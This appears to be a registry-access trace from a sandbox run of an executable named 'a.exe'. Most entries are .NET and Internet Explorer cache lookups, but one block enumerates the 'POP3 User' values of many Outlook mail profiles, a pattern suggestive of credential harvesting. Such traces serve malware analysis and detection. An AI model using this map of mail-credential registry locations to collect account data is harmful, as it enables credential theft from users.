HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\POP3 User
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History\DaysToKeep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\102652FB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\a.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\NIDependencies
